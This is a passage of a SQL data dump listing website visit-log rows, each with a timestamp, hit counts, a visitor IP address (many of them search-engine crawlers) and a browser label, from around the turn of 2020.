1,0,0,'66.249.64.28','chrome'),(472209,1577696261,1,1,0,0,'66.249.64.27','chrome'),(472210,1577696532,1,1,0,0,'157.55.39.181','other'),(472211,1577696813,1,1,0,0,'66.249.64.28','chrome'),(472212,1577696862,1,1,0,0,'207.46.13.196','other'),(472213,1577698721,1,1,0,0,'8.29.198.27','other'),(472214,1577698920,1,1,0,0,'157.55.39.181','other'),(472215,1577699432,1,1,0,0,'66.249.64.26','chrome'),(472216,1577699580,1,1,0,0,'8.29.198.25','other'),(472217,1577700646,1,1,0,0,'3.215.183.15','chrome'),(472218,1577703308,1,1,0,0,'91.196.178.101','chrome'),(472219,1577703559,1,1,0,0,'207.46.13.196','other'),(472220,1577703950,1,1,0,0,'66.249.70.33','chrome'),(472221,1577704546,25,25,0,0,'84.17.48.43','chrome'),(472222,1577704640,1,1,0,0,'66.249.64.28','chrome'),(472223,1577705086,1,1,0,0,'66.249.64.27','chrome'),(472224,1577705193,1,1,0,0,'207.46.13.75','other'),(472225,1577705424,1,1,0,0,'109.74.154.72','chrome'),(472226,1577705434,1,1,0,0,'66.249.70.36','chrome'),(472227,1577706326,1,1,0,0,'66.249.64.27','chrome'),(472228,1577706405,1,1,0,0,'66.249.64.26','chrome'),(472229,1577706460,1,1,0,0,'66.249.70.33','chrome'),(472230,1577706517,1,1,0,0,'66.249.70.62','chrome'),(472231,1577707019,2,2,0,0,'66.249.64.28','chrome'),(472232,1577707400,2,2,0,0,'207.46.13.75','other'),(472233,1577708363,1,1,0,0,'66.249.70.62','chrome'),(472234,1577708408,1,1,0,0,'66.249.64.27','chrome'),(472235,1577709594,2,2,0,0,'8.29.198.26','other'),(472236,1577710114,1,1,0,0,'64.246.165.140','firefox'),(472237,1577710353,1,1,0,0,'66.249.70.62','chrome'),(472238,1577710649,1,1,0,0,'66.249.64.27','chrome'),(472239,1577711284,1,1,0,0,'37.53.235.16','chrome'),(472240,1577711794,1,1,0,0,'66.249.64.26','chrome'),(472241,1577712168,2,2,0,0,'66.249.64.28','chrome'),(472242,1577712772,1,1,0,0,'66.249.64.26','chrome'),(472243,1577713235,1,1,0,0,'66.249.64.27','chrome'),(472244,1577714116,1,1,0,0,'178.154.171.127','other'),(472245,1577714189,1,1,0,0,'178.154.171.134','other'),(472246,1577714678,1,1,0,0,'66.249.64.28','chrome'),(472247,1577715303,1,1,0,0,'178.154.171.127','other'),(472248,1577715710,1,1,0,0,'66.249.64.27','chrome'),(472249,1577716231,2,2,0,0,'207.46.13.196','other'),(472250,1577716307,1,1,0,0,'178.154.171.134','other'),(472251,1577716769,1,1,0,0,'66.249.64.26','chrome'),(472252,1577718064,1,1,0,0,'66.249.64.28','chrome'),(472253,1577718376,1,1,0,0,'66.249.64.27','chrome'),(472254,1577719559,2,2,0,0,'66.249.64.26','chrome'),(472255,1577719671,2,2,0,0,'66.249.70.36','chrome'),(472256,1577719882,1,1,0,0,'66.249.70.62','chrome'),(472257,1577719924,2,2,0,0,'66.249.64.28','chrome'),(472258,1577720059,2,2,0,0,'207.46.13.196','other'),(472259,1577720434,1,1,0,0,'37.145.153.37','other'),(472260,1577720466,1,1,0,0,'8.29.198.26','other'),(472261,1577720499,1,1,0,0,'178.154.171.127','other'),(472262,1577720684,1,1,0,0,'37.53.111.127','chrome'),(472263,1577720910,1,1,0,0,'66.249.64.28','chrome'),(472264,1577721018,2,2,0,0,'207.46.13.75','other'),(472265,1577721283,1,1,0,0,'178.154.171.134','other'),(472266,1577721302,1,1,0,0,'8.29.198.25','other'),(472267,1577721627,1,1,0,0,'66.249.64.27','chrome'),(472268,1577721849,1,1,0,0,'66.249.70.62','chrome'),(472269,1577721913,23,23,0,0,'84.17.48.43','chrome'),(472270,1577722288,1,1,0,0,'178.154.171.127','other'),(472271,1577722330,1,1,0,0,'178.154.171.134','other'),(472272,1577723299,1,1,0,0,'178.154.171.127','other'),(472273,1577723333,1,1,0,0,'207.46.13.196','other'),(472274,1577724376,1,1,0,0,'178.154.171.127','other'),(472275,1577724666,1,1,0,0,'66.249.64.27','chrome'),(472276,1577724685,1,1,0,0,'66.249.64.26','chrome'),(472277,1577726589,1,1,0,0,'178.154.171.127','other'),(472278,1577726694,1,1,0,0,'207.46.13.196','other'),(472279,1577727738,1,1,0,0,'91.196.178.65','chrome'),(472280,1577727748,1,1,0,0,'141.8.183.53','other'),(472281,1577730045,1,1,0,0,'207.46.13.196','other'),(472282,1577730637,2,2,0,0,'31.13.115.10','other'),(472283,1577730638,1,1,0,0,'31.13.115.13','other'),(472285,1577730999,1,1,0,0,'66.249.64.28','chrome'),(472286,1577731322,1,1,0,0,'8.29.198.25','other'),(472287,1577732183,1,1,0,0,'8.29.198.26','other'),(472288,1577732199,1,1,0,0,'31.13.127.18','other'),(472289,1577732200,4,4,0,0,'31.13.127.21','other'),(472304,1577732201,1,1,0,0,'31.13.127.11','other'),(472305,1577732889,1,1,0,0,'66.249.70.36','chrome'),(472306,1577733011,1,1,0,0,'178.154.171.134','other'),(472307,1577733178,1,1,0,0,'66.249.70.62','chrome'),(472308,1577733637,2,2,0,0,'185.41.21.61','chrome'),(472309,1577733983,2,2,0,0,'178.154.171.134','other'),(472310,1577734554,1,1,0,0,'66.249.64.26','chrome'),(472311,1577734585,3,3,0,0,'66.249.64.27','chrome'),(472312,1577735225,1,1,0,0,'207.46.13.196','other'),(472313,1577735446,1,1,0,0,'66.249.64.28','chrome'),(472314,1577735576,1,1,0,0,'66.249.70.33','chrome'),(472315,1577736349,2,1,1,0,'207.46.13.75',''),(472316,1577736475,2,2,0,0,'66.249.64.28','chrome'),(472317,1577736801,1,1,0,0,'178.154.171.134','other'),(472318,1577737366,2,2,0,0,'95.213.141.126','opera'),(472319,1577737450,1,1,0,0,'66.249.64.26','chrome'),(472320,1577737611,1,1,0,0,'13.66.139.0','other'),(472321,1577737773,1,1,0,0,'66.249.64.28','chrome'),(472322,1577737807,1,1,0,0,'178.154.171.134','other'),(472323,1577738048,1,1,0,0,'207.46.13.75','other'),(472324,1577738583,1,1,0,0,'176.226.176.193','chrome'),(472325,1577738929,1,1,0,0,'66.249.64.27','chrome'),(472326,1577738948,1,1,0,0,'178.154.171.134','other'),(472327,1577739110,1,1,0,0,'66.249.70.33','chrome'),(472328,1577739327,2,2,0,0,'207.46.13.75','other'),(472329,1577739441,1,1,0,0,'31.170.150.39','firefox'),(472330,1577740210,1,1,0,0,'178.154.171.134','other'),(472331,1577740331,1,1,0,0,'178.154.171.127','other'),(472332,1577741503,1,1,0,0,'178.154.171.134','other'),(472333,1577742197,2,2,0,0,'8.29.198.25','other'),(472334,1577742398,1,1,0,0,'66.249.64.26','chrome'),(472335,1577742895,2,2,0,0,'178.154.171.134','other'),(472336,1577743488,3,3,0,0,'66.249.64.27','chrome'),(472337,1577743498,1,1,0,0,'66.249.64.26','chrome'),(472338,1577744790,1,1,0,0,'66.249.64.26','chrome'),(472339,1577745315,2,2,0,0,'66.249.64.28','chrome'),(472340,1577745394,1,1,0,0,'207.46.13.196','other'),(472341,1577745545,1,1,0,0,'66.249.70.33','chrome'),(472342,1577745771,2,2,0,0,'66.249.64.27','chrome'),(472343,1577745966,1,1,0,0,'66.249.70.62','chrome'),(472344,1577746539,3,3,0,0,'178.154.171.134','other'),(472345,1577746804,1,1,0,0,'66.249.64.27','chrome'),(472346,1577747169,1,1,0,0,'207.46.13.196','other'),(472347,1577747796,1,1,0,0,'178.154.171.134','other'),(472348,1577748814,1,1,0,0,'66.249.64.28','chrome'),(472349,1577749101,2,2,0,0,'178.154.171.134','other'),(472350,1577749349,1,1,0,0,'37.113.164.56','chrome'),(472351,1577749609,1,1,0,0,'66.249.70.36','chrome'),(472352,1577751876,1,1,0,0,'178.154.171.127','other'),(472353,1577753065,2,2,0,0,'8.29.198.25','other'),(472354,1577753714,1,1,0,0,'62.205.134.182','other'),(472355,1577754171,1,1,0,0,'141.8.132.37','other'),(472356,1577754620,1,1,0,0,'141.8.183.73','other'),(472357,1577754744,1,1,0,0,'207.46.13.196','other'),(472358,1577755781,2,2,0,0,'178.154.171.134','other'),(472359,1577756905,1,1,0,0,'178.154.171.127','other'),(472360,1577757039,1,1,0,0,'107.175.37.106','chrome'),(472361,1577757084,1,1,0,0,'172.245.255.184','chrome'),(472362,1577758275,1,1,0,0,'178.154.171.134','other'),(472363,1577760728,1,1,0,0,'178.154.171.127','other'),(472364,1577760928,1,1,0,0,'54.187.246.133','chrome'),(472365,1577760931,1,1,0,0,'52.41.211.72','other'),(472366,1577761717,1,1,0,0,'141.8.183.73','other'),(472367,1577763920,1,1,0,0,'8.29.198.27','other'),(472368,1577764301,1,1,0,0,'178.154.171.134','other'),(472369,1577764779,1,1,0,0,'8.29.198.25','other'),(472370,1577764838,1,1,0,0,'209.17.97.90','other'),(472371,1577765361,3,3,0,0,'178.154.171.134','other'),(472372,1577765796,1,1,0,0,'207.46.13.196','other'),(472373,1577766120,25,25,0,0,'178.162.216.53','chrome'),(472374,1577766593,1,1,0,0,'178.154.171.134','other'),(472375,1577766967,1,1,0,0,'195.10.210.70','chrome'),(472376,1577768151,1,1,0,0,'13.66.139.0','other'),(472377,1577769418,2,2,0,0,'178.154.171.134','other'),(472378,1577770025,1,1,0,0,'209.17.96.210','other'),(472379,1577771047,1,1,0,0,'62.205.134.182','other'),(472380,1577772201,1,1,0,0,'207.46.13.196','other'),(472381,1577772248,1,1,0,0,'188.93.56.216','firefox'),(472382,1577774797,1,1,0,0,'8.29.198.25','other'),(472383,1577774853,2,2,0,0,'178.154.171.134','other'),(472384,1577775278,1,1,0,0,'207.46.13.200','other'),(472385,1577775656,1,1,0,0,'8.29.198.27','other'),(472386,1577775852,1,0,1,0,'66.249.64.28',''),(472387,1577777186,1,0,1,0,'66.249.70.62',''),(472388,1577778032,1,1,0,0,'91.196.122.250','chrome'),(472389,1577778352,1,1,0,0,'178.154.171.134','other'),(472390,1577779956,1,1,0,0,'82.145.208.143','other'),(472391,1577780591,1,1,0,0,'77.181.5.150','firefox'),(472392,1577782387,1,1,0,0,'207.46.13.200','other'),(472393,1577782610,21,21,0,0,'178.162.216.53','chrome'),(472394,1577783422,1,1,0,0,'178.154.171.134','other'),(472395,1577783440,1,1,0,0,'178.154.171.127','other'),(472396,1577783500,1,1,0,0,'54.36.149.104','other'),(472397,1577783508,1,1,0,0,'88.99.2.203','other'),(472398,1577783523,2,2,0,0,'136.243.70.68','other'),(472399,1577785669,2,2,0,0,'8.29.198.27','other'),(472401,1577785745,1,1,0,0,'54.36.149.95','other'),(472402,1577785747,1,1,0,0,'54.36.150.106','other'),(472403,1577785894,1,1,0,0,'66.249.64.26','chrome'),(472404,1577786326,1,1,0,0,'54.36.149.20','other'),(472405,1577787139,1,1,0,0,'66.249.64.27','chrome'),(472406,1577787519,1,1,0,0,'207.46.13.200','other'),(472407,1577787532,1,1,0,0,'141.8.132.37','other'),(472408,1577788501,1,1,0,0,'141.8.188.39','other'),(472409,1577788944,1,1,0,0,'95.108.213.55','other'),(472410,1577789059,1,1,0,0,'91.196.178.83','other'),(472411,1577789414,1,1,0,0,'66.249.64.27','chrome'),(472412,1577789499,1,1,0,0,'54.36.149.34','other'),(472413,1577789531,2,2,0,0,'66.249.64.26','chrome'),(472414,1577789713,1,1,0,0,'46.211.156.15','chrome'),(472415,1577789876,1,1,0,0,'46.211.36.114','chrome'),(472416,1577789897,1,1,0,0,'185.35.11.221','chrome'),(472417,1577790236,1,1,0,0,'94.131.209.218','chrome'),(472418,1577791634,1,1,0,0,'66.249.64.27','chrome'),(472419,1577791859,1,1,0,0,'141.8.188.39','other'),(472420,1577792185,1,1,0,0,'109.74.154.72','chrome'),(472421,1577792669,1,1,0,0,'66.249.64.28','chrome'),(472422,1577792751,1,1,0,0,'66.249.64.27','chrome'),(472423,1577792766,1,1,0,0,'54.36.149.59','other'),(472424,1577792881,1,1,0,0,'54.36.149.17','other'),(472425,1577793293,1,1,0,0,'54.36.149.85','other'),(472426,1577793376,1,1,0,0,'157.55.39.255','other'),(472427,1577794173,1,1,0,0,'66.249.64.28','chrome'),(472428,1577794318,1,1,0,0,'95.108.213.55','other'),(472429,1577794546,1,1,0,0,'54.36.149.102','other'),(472430,1577794754,1,1,0,0,'54.36.149.13','other'),(472431,1577794764,2,2,0,0,'66.249.70.62','chrome'),(472432,1577795313,1,1,0,0,'66.249.64.26','chrome'),(472433,1577796540,1,1,0,0,'54.36.149.54','other'),(472434,1577796570,1,1,0,0,'8.29.198.25','other'),(472435,1577797364,3,3,0,0,'66.249.64.26','chrome'),(472436,1577797419,1,1,0,0,'8.29.198.27','other'),(472437,1577797827,1,1,0,0,'66.249.64.28','chrome'),(472438,1577797831,1,1,0,0,'66.249.70.36','chrome'),(472439,1577798346,1,1,0,0,'54.36.149.99','other'),(472440,1577798995,1,1,0,0,'54.36.149.19','other'),(472441,1577800247,1,1,0,0,'141.8.188.39','other'),(472442,1577802457,1,1,0,0,'157.55.39.150','other'),(472443,1577802700,1,1,0,0,'141.8.142.2','other'),(472444,1577803296,1,1,0,0,'54.36.149.83','other'),(472445,1577803451,4,4,0,0,'120.132.59.70','msie'),(472446,1577803482,1,1,0,0,'120.132.59.70','other'),(472447,1577803876,1,1,0,0,'157.55.39.255','other'),(472448,1577804012,1,1,0,0,'141.8.188.38','other'),(472449,1577804692,1,1,0,0,'207.46.13.200','other'),(472450,1577805832,1,1,0,0,'94.153.110.62','chrome'),(472451,1577806113,1,1,0,0,'54.36.149.49','other'),(472452,1577806327,2,2,0,0,'157.55.39.255','other'),(472453,1577807433,2,2,0,0,'8.29.198.27','other'),(472454,1577807723,1,1,0,0,'54.36.149.66','other'),(472455,1577807744,1,1,0,0,'141.8.142.119','other'),(472456,1577808263,1,1,0,0,'54.36.149.58','other'),(472457,1577808899,1,1,0,0,'5.45.207.43','other'),(472458,1577812950,1,1,0,0,'31.13.127.15','other'),(472459,1577812951,1,1,0,0,'31.13.127.1','other'),(472460,1577812978,3,3,0,0,'207.46.13.200','other'),(472461,1577813493,1,1,0,0,'68.183.154.12','other'),(472462,1577814245,1,1,0,0,'54.36.149.102','other'),(472463,1577814746,1,0,1,0,'66.249.64.26',''),(472464,1577815343,1,1,0,0,'157.55.39.255','other'),(472465,1577815764,3,3,0,0,'157.55.39.150','other'),(472466,1577816658,1,1,0,0,'54.36.149.62','other'),(472467,1577816935,1,1,0,0,'157.55.39.150','other'),(472468,1577817633,1,1,0,0,'207.46.13.200','other'),(472469,1577817812,1,1,0,0,'128.124.145.211','chrome'),(472470,1577818316,1,1,0,0,'8.29.198.27','other'),(472471,1577819159,1,1,0,0,'8.29.198.26','other'),(472472,1577819777,1,1,0,0,'91.196.178.183','chrome'),(472473,1577820753,1,1,0,0,'157.55.39.150','other'),(472474,1577821043,1,1,0,0,'54.36.149.74','other'),(472475,1577821278,2,2,0,0,'207.46.13.200','other'),(472476,1577823446,1,1,0,0,'91.196.178.104','chrome'),(472477,1577823684,1,1,0,0,'95.108.181.104','other'),(472478,1577824051,1,1,0,0,'54.36.149.98','other'),(472479,1577824078,1,1,0,0,'37.53.224.183','chrome'),(472480,1577824122,1,1,0,0,'46.211.140.187','chrome'),(472481,1577824585,1,1,0,0,'54.36.149.54','other'),(472482,1577825657,1,1,0,0,'54.36.149.99','other'),(472483,1577829176,1,1,0,0,'8.29.198.26','other'),(472484,1577829243,1,1,0,0,'54.36.149.24','other'),(472485,1577830013,1,1,0,0,'8.29.198.27','other'),(472486,1577832169,1,1,0,0,'54.36.149.7','other'),(472487,1577832367,1,1,0,0,'54.36.149.66','other'),(472488,1577832870,1,1,0,0,'54.36.149.88','other'),(472489,1577833253,2,2,0,0,'5.9.151.57','other'),(472490,1577833737,1,1,0,0,'37.9.113.177','other'),(472491,1577834023,1,1,0,0,'91.196.178.130','other'),(472492,1577834133,2,2,0,0,'95.211.209.246','chrome'),(472493,1577834147,1,1,0,0,'66.249.93.218','chrome'),(472494,1577834150,1,1,0,0,'128.30.52.96','other'),(472495,1577834802,1,1,0,0,'91.196.178.56','chrome'),(472496,1577835267,1,1,0,0,'91.196.178.188','chrome'),(472497,1577835278,1,1,0,0,'207.46.13.200','other'),(472498,1577835447,1,1,0,0,'91.196.177.149','other'),(472499,1577836040,1,1,0,0,'54.36.149.73','other'),(472500,1577836763,1,1,0,0,'87.250.224.90','other'),(472501,1577837110,1,1,0,0,'37.73.30.75','chrome'),(472502,1577837833,1,1,0,0,'13.66.139.0','other'),(472503,1577838390,1,1,0,0,'178.54.222.64','chrome'),(472504,1577838885,2,2,0,0,'91.196.178.43','chrome'),(472505,1577839820,1,1,0,0,'207.46.13.200','other'),(472506,1577840037,1,1,0,0,'8.29.198.27','other'),(472507,1577840114,1,1,0,0,'62.205.134.182','other'),(472508,1577840411,1,1,0,0,'178.154.171.7','other'),(472509,1577840872,1,1,0,0,'8.29.198.26','other'),(472510,1577842526,1,1,0,0,'78.47.228.112','chrome'),(472511,1577843271,1,1,0,0,'54.201.146.42','other'),(472512,1577843653,1,1,0,0,'130.180.219.145','chrome'),(472513,1577843776,1,1,0,0,'13.66.139.0','other'),(472514,1577844857,1,1,0,0,'130.180.219.145','chrome'),(472515,1577846522,2,2,0,0,'207.46.13.200','other'),(472516,1577847503,1,1,0,0,'141.8.142.128','other'),(472517,1577847880,2,2,0,0,'207.46.13.200','other'),(472518,1577849642,1,1,0,0,'35.163.236.167','chrome'),(472519,1577850890,2,2,0,0,'8.29.198.27','other'),(472520,1577851915,1,1,0,0,'104.229.110.109','other'),(472521,1577852348,1,1,0,0,'85.249.73.90','chrome'),(472522,1577852354,1,1,0,0,'37.204.58.117','chrome'),(472523,1577852909,1,1,0,0,'207.46.13.200','other'),(472524,1577853942,1,1,0,0,'207.46.13.200','other'),(472525,1577857120,1,1,0,0,'37.9.113.202','other'),(472526,1577857123,1,1,0,0,'95.108.213.39','other'),(472527,1577857560,1,1,0,0,'62.205.134.182','other'),(472528,1577857733,1,1,0,0,'207.46.13.200','other'),(472529,1577858477,1,1,0,0,'87.250.224.90','other'),(472530,1577859736,1,1,0,0,'141.8.188.66','other'),(472531,1577860554,1,1,0,0,'207.46.13.200','other'),(472532,1577861748,2,2,0,0,'8.29.198.25','other'),(472533,1577862223,1,1,0,0,'207.46.13.200','other'),(472534,1577864060,1,1,0,0,'91.106.199.104','other'),(472535,1577866253,1,1,0,0,'54.36.149.49','other'),(472536,1577866771,1,1,0,0,'185.234.217.88','firefox'),(472537,1577866869,1,1,0,0,'91.196.178.81','chrome'),(472538,1577867031,2,2,0,0,'46.211.131.227','chrome'),(472539,1577867243,1,1,0,0,'37.73.55.174','chrome'),(472540,1577868943,1,1,0,0,'207.46.13.200','other'),(472541,1577869016,1,1,0,0,'54.36.149.74','other'),(472542,1577870288,5,5,0,0,'95.216.19.59','other'),(472543,1577871023,1,1,0,0,'207.46.13.200','other'),(472544,1577871749,1,1,0,0,'66.249.64.27','chrome'),(472545,1577872610,1,1,0,0,'8.29.198.26','other'),(472546,1577873433,1,1,0,0,'8.29.198.27','other'),(472547,1577873991,1,1,0,0,'3.231.4.68','chrome'),(472548,1577875432,1,1,0,0,'13.66.139.0','other'),(472549,1577875616,1,1,0,0,'207.46.13.200','other'),(472550,1577875964,2,2,0,0,'95.213.141.126','opera'),(472551,1577876226,1,1,0,0,'46.211.108.35','chrome'),(472552,1577877032,1,1,0,0,'207.46.13.200','other'),(472553,1577877405,2,2,0,0,'31.13.127.1','other'),(472554,1577877771,1,1,0,0,'91.196.178.131','firefox'),(472555,1577878576,1,1,0,0,'109.74.154.72','chrome'),(472556,1577879154,1,1,0,0,'95.108.213.3','other'),(472557,1577880029,2,2,0,0,'207.46.13.200','other'),(472558,1577880420,1,1,0,0,'46.211.217.105','chrome'),(472559,1577881135,1,1,0,0,'207.46.13.200','other'),(472560,1577882124,2,2,0,0,'3.133.154.192','other'),(472561,1577882710,1,1,0,0,'213.180.203.124','other'),(472562,1577883461,1,1,0,0,'8.29.198.25','other'),(472563,1577884135,1,1,0,0,'207.46.13.200','other'),(472564,1577884286,1,1,0,0,'8.29.198.27','other'),(472565,1577884928,1,1,0,0,'213.180.203.124','other'),(472566,1577885488,1,1,0,0,'193.106.30.99','firefox'),(472567,1577885892,1,1,0,0,'91.196.178.55','chrome'),(472568,1577886206,1,1,0,0,'213.180.203.124','other'),(472569,1577887491,1,1,0,0,'157.55.39.232','other'),(472570,1577892579,1,1,0,0,'213.180.203.124','other'),(472571,1577894314,1,1,0,0,'8.29.198.26','other'),(472572,1577894408,1,1,0,0,'31.181.111.248','chrome'),(472573,1577894707,1,1,0,0,'213.180.203.124','other'),(472574,1577895154,1,1,0,0,'8.29.198.27','other'),(472575,1577896016,1,1,0,0,'213.180.203.124','other'),(472576,1577899771,1,1,0,0,'213.180.203.106','other'),(472577,1577899807,1,1,0,0,'188.122.20.101','chrome'),(472578,1577901091,2,2,0,0,'139.162.162.241','other'),(472579,1577901201,1,1,0,0,'213.180.203.1','other'),(472580,1577902230,1,1,0,0,'91.196.178.131','chrome'),(472581,1577902494,1,1,0,0,'213.180.203.75','other'),(472582,1577902695,1,1,0,0,'157.55.39.232','other'),(472583,1577903975,1,1,0,0,'157.55.39.232','other'),(472584,1577904291,1,1,0,0,'91.196.178.46','chrome'),(472585,1577904606,1,1,0,0,'91.196.178.37','chrome'),(472586,1577905151,1,1,0,0,'8.29.198.27','other'),(472587,1577906016,1,1,0,0,'8.29.198.25','other'),(472588,1577906090,1,1,0,0,'91.196.178.132','chrome'),(472589,1577906408,1,1,0,0,'207.46.13.218','other'),(472590,1577908081,1,1,0,0,'157.55.39.232','other'),(472591,1577909276,1,1,0,0,'157.55.39.232','other'),(472592,1577909768,2,2,0,0,'51.68.152.26','chrome'),(472593,1577910986,1,1,0,0,'207.46.13.218','other'),(472594,1577911961,1,1,0,0,'207.46.13.218','other'),(472595,1577912322,1,1,0,0,'213.180.203.142','other'),(472596,1577912387,1,1,0,0,'91.196.178.131','chrome'),(472597,1577913376,1,1,0,0,'207.46.13.218','other'),(472598,1577914313,2,2,0,0,'207.46.13.218','other'),(472599,1577915124,1,1,0,0,'213.180.203.75','other'),(472600,1577915390,1,1,0,0,'91.196.178.83','chrome'),(472601,1577915518,1,1,0,0,'157.55.39.232','other'),(472602,1577915941,2,0,2,0,'207.46.13.218',''),(472603,1577915996,2,2,0,0,'8.29.198.26','other'),(472604,1577917233,1,1,0,0,'194.44.101.252','chrome'),(472605,1577917873,1,1,0,0,'213.180.203.1','other'),(472606,1577917954,1,1,0,0,'46.211.135.151','chrome'),(472607,1577918691,1,1,0,0,'178.251.107.249','chrome'),(472608,1577919307,1,1,0,0,'213.180.203.71','other'),(472609,1577919465,1,1,0,0,'213.180.203.96','other'),(472610,1577920072,2,2,0,0,'207.46.13.218','other'),(472611,1577920897,1,1,0,0,'157.55.39.232','other'),(472612,1577921771,1,1,0,0,'213.180.203.75','other'),(472613,1577923106,1,1,0,0,'213.180.203.192','other'),(472614,1577923141,1,1,0,0,'213.180.203.75','other'),(472615,1577924275,1,1,0,0,'157.55.39.232','other'),(472616,1577926517,1,1,0,0,'62.205.134.182','other'),(472617,1577926855,1,1,0,0,'8.29.198.25','other'),(472618,1577927711,1,1,0,0,'8.29.198.26','other'),(472619,1577929097,1,1,0,0,'207.46.13.218','other'),(472620,1577932672,1,1,0,0,'213.180.203.120','other'),(472621,1577932693,1,1,0,0,'207.46.13.218','other'),(472622,1577932874,1,1,0,0,'213.180.203.151','other'),(472623,1577934398,1,1,0,0,'13.66.139.0','other'),(472624,1577934607,1,1,0,0,'157.55.39.232','other'),(472625,1577934704,1,1,0,0,'213.180.203.196','other'),(472626,1577935511,3,3,0,0,'3.17.154.116','chrome'),(472627,1577935600,1,1,0,0,'207.46.13.218','other'),(472628,1577936159,1,1,0,0,'35.165.190.48','chrome'),(472629,1577936163,1,1,0,0,'52.41.211.72','other'),(472630,1577936437,1,1,0,0,'157.55.39.232','other'),(472631,1577936974,1,1,0,0,'213.180.203.186','other'),(472632,1577937697,1,1,0,0,'8.29.198.26','other'),(472633,1577938476,2,2,0,0,'207.46.13.218','other'),(472634,1577938554,1,1,0,0,'8.29.198.25','other'),(472635,1577939975,2,2,0,0,'207.46.13.218','other'),(472636,1577940078,1,1,0,0,'157.55.39.232','other'),(472637,1577941231,1,1,0,0,'184.94.240.92','firefox'),(472638,1577941332,1,1,0,0,'213.180.203.141','other'),(472639,1577941746,1,1,0,0,'213.180.203.103','other'),(472640,1577941872,1,1,0,0,'207.46.13.218','other'),(472641,1577943276,1,1,0,0,'207.46.13.110','other'),(472642,1577943807,1,1,0,0,'207.46.13.218','other'),(472643,1577943894,1,1,0,0,'62.205.134.182','other'),(472644,1577944177,1,1,0,0,'157.55.39.254','other'),(472645,1577946675,1,1,0,0,'213.180.203.125','other'),(472646,1577947777,1,1,0,0,'213.180.203.189','other'),(472647,1577948253,1,1,0,0,'207.46.13.110','other'),(472648,1577948525,1,1,0,0,'8.29.198.27','other'),(472649,1577948929,1,1,0,0,'213.180.203.176','other'),(472650,1577949404,1,1,0,0,'8.29.198.26','other'),(472651,1577949712,1,1,0,0,'91.196.178.187','chrome'),(472652,1577949971,1,1,0,0,'91.196.178.83','chrome'),(472653,1577950307,1,1,0,0,'91.196.178.164','chrome'),(472654,1577951177,1,1,0,0,'91.196.177.46','chrome'),(472655,1577951365,1,1,0,0,'213.180.203.23','other'),(472656,1577952202,1,1,0,0,'91.196.178.173','chrome'),(472657,1577953059,1,1,0,0,'146.158.6.142','chrome'),(472658,1577953085,1,1,0,0,'37.9.113.6','other'),(472659,1577953311,1,1,0,0,'157.55.39.254','other'),(472660,1577955517,1,1,0,0,'138.246.253.5','chrome'),(472661,1577955631,1,1,0,0,'207.46.13.110','other'),(472662,1577957886,1,1,0,0,'3.225.221.154','chrome'),(472663,1577958118,1,1,0,0,'91.196.178.164','chrome'),(472664,1577959368,1,1,0,0,'8.29.198.25','other'),(472665,1577959646,1,1,0,0,'213.180.203.141','other'),(472666,1577959725,1,1,0,0,'207.46.13.110','other'),(472667,1577959834,1,1,0,0,'66.249.64.28','chrome'),(472668,1577960048,1,1,0,0,'157.55.39.254','other'),(472669,1577960250,1,1,0,0,'8.29.198.26','other'),(472670,1577960685,1,1,0,0,'92.112.124.239','chrome'),(472671,1577961649,1,1,0,0,'207.46.13.110','other'),(472672,1577961988,1,1,0,0,'213.180.203.77','other'),(472673,1577962444,1,1,0,0,'157.55.39.254','other'),(472674,1577962582,1,1,0,0,'91.196.178.91','chrome'),(472675,1577962931,1,1,0,0,'213.180.203.106','other'),(472676,1577963015,1,1,0,0,'213.180.203.191','other'),(472677,1577963444,1,0,1,0,'157.55.39.254',''),(472678,1577964693,1,1,0,0,'109.74.154.72','chrome'),(472679,1577965226,3,3,0,0,'213.180.203.124','other'),(472680,1577965946,3,3,0,0,'207.46.13.110','other'),(472681,1577966235,1,1,0,0,'157.55.39.254','other'),(472682,1577966678,1,1,0,0,'213.180.203.125','other'),(472683,1577967034,1,1,0,0,'213.174.9.224','other'),(472684,1577967083,1,1,0,0,'46.201.36.26','firefox'),(472685,1577967619,1,1,0,0,'213.180.203.84','other'),(472686,1577967663,2,2,0,0,'213.180.203.124','other'),(472687,1577968940,1,1,0,0,'37.53.90.175','chrome'),(472688,1577970232,1,1,0,0,'8.29.198.27','other'),(472689,1577970286,1,1,0,0,'91.196.178.180','chrome'),(472690,1577970865,1,1,0,0,'157.55.39.254','other'),(472691,1577971124,1,1,0,0,'8.29.198.25','other'),(472692,1577971304,2,2,0,0,'157.55.39.138','other'),(472693,1577972193,1,1,0,0,'91.196.178.187','chrome'),(472694,1577972357,1,1,0,0,'213.174.9.224','chrome'),(472695,1577972628,1,1,0,0,'157.55.39.138','other'),(472696,1577973121,1,1,0,0,'91.196.177.46','chrome'),(472697,1577974111,1,1,0,0,'176.226.176.193','chrome'),(472698,1577975334,1,1,0,0,'157.55.39.138','other'),(472699,1577977421,1,1,0,0,'91.196.178.171','chrome'),(472700,1577977708,1,1,0,0,'91.196.178.83','chrome'),(472701,1577978777,1,1,0,0,'178.154.171.66','other'),(472702,1577978823,1,1,0,0,'178.154.171.127','other'),(472703,1577979286,1,1,0,0,'176.124.133.65','chrome'),(472704,1577980196,1,1,0,0,'178.154.171.127','other'),(472705,1577981101,1,1,0,0,'8.29.198.25','other'),(472706,1577981129,1,1,0,0,'178.154.171.134','other'),(472707,1577981168,1,1,0,0,'178.154.171.127','other'),(472708,1577982001,1,1,0,0,'8.29.198.26','other'),(472709,1577983408,1,1,0,0,'87.250.224.90','other'),(472710,1577984199,1,1,0,0,'78.47.228.111','chrome'),(472711,1577984201,1,1,0,0,'78.47.228.112','chrome'),(472712,1577985352,1,1,0,0,'157.55.39.138','other'),(472713,1577985681,1,1,0,0,'95.108.181.103','other'),(472714,1577985753,1,1,0,0,'141.8.142.177','other'),(472715,1577986013,1,1,0,0,'91.209.11.236','other'),(472716,1577986294,1,1,0,0,'193.202.21.20','chrome'),(472717,1577986525,1,1,0,0,'195.123.193.67','chrome'),(472718,1577986897,1,1,0,0,'51.159.18.103','chrome'),(472719,1577986936,1,1,0,0,'141.8.188.20','other'),(472720,1577988349,1,1,0,0,'141.8.142.2','other'),(472721,1577989489,1,1,0,0,'178.154.171.127','other'),(472722,1577990403,1,1,0,0,'141.8.132.2','other'),(472723,1577990417,1,1,0,0,'37.9.113.33','other'),(472724,1577991496,1,1,0,0,'141.8.188.20','other'),(472725,1577991584,1,1,0,0,'141.8.183.100','other'),(472726,1577991961,1,1,0,0,'8.29.198.25','other'),(472727,1577992044,1,1,0,0,'91.196.178.46','chrome'),(472728,1577992188,1,1,0,0,'91.196.178.166','chrome'),(472729,1577992618,1,1,0,0,'95.1